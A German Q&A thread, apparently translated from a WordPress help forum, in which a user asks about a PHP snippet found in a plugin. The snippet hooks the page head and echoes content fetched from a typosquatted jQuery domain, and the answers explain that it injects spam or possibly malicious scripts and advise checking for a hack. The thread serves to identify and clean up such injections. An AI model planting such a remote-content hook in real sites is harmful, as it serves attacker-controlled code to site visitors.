Ich habe das in einem Plugin gefunden. Was tut es? ist es gefährlich?
add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
if(function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);
$jquery = curl_exec($ch);
curl_close($ch);
echo "$jquery";
}
}
add_action('wp_head', 'wp__head');
}
Antworten:
Es wird ein Markup-Block geladen, der Spam enthält (ich habe überlegt, einen Teil des Quellcodes zu veröffentlichen, möchte aber keine Werbung für den Inhalt machen), und zwar von einer Domain, bei der es sich um einen Rechtschreibfehler der
http://jquery.com/
von jQuery verwendeten Domain handelt , eine seriöse und beliebte Javascript-Bibliothek und eine, die WordPress in den Core integriert. Ich denke, die Idee ist es, diese Bibliothek zu laden, obwohl etwas ganz anderes geladen wird.Auf andere Weise wird versucht, jQuery zu laden. Beachten Sie den Variablennamen
$jquery
.Möglicherweise wird auch versucht, schädliche Skripts zu laden. Ich habe nicht nachgesehen. Ich würde es auf jeden Fall als gefährlich bezeichnen, zumal sich der Inhalt dieser Seite jederzeit ändern kann, wenn der Domänencontroller dies wünscht.
Im besten Fall wird Ihre Website beschädigt, da Suchmaschinen auf Websites herabsehen, die Spam verbreiten.
Benutze es nicht. Es ist weder für Sie noch für andere im Internet von Vorteil, außer für die Personen, die die Site betreiben. Wenn Sie dies auf einer seriösen Website gefunden haben, melden Sie es ihnen.
quelle
Ja, es ist ein gefährlicher Code, der Inhalte von einer Spam-Site lädt.
Sie haben das Plugin nicht benannt, aber wenn Sie diesen Code gefunden haben, nachdem er auf Ihrer Website installiert wurde, ist es möglich, dass der Plugin-Code nicht so vom Entwickler stammt, sondern erst nach der Installation gehackt wurde. In diesem Fall finden Sie den schädlichen Code möglicherweise auf mehr Websites als nur in diesem Plugin.
Überprüfen Sie den heruntergeladenen Plugin-Code, von dem Sie das Plugin ursprünglich bezogen haben, und prüfen Sie, ob dieser schädliche Code ursprünglich vorhanden war. Wenn nicht, wurde Ihre Website gehackt. Wenn Sie dies feststellen, lesen Sie diesen Artikel aus dem Codex .
quelle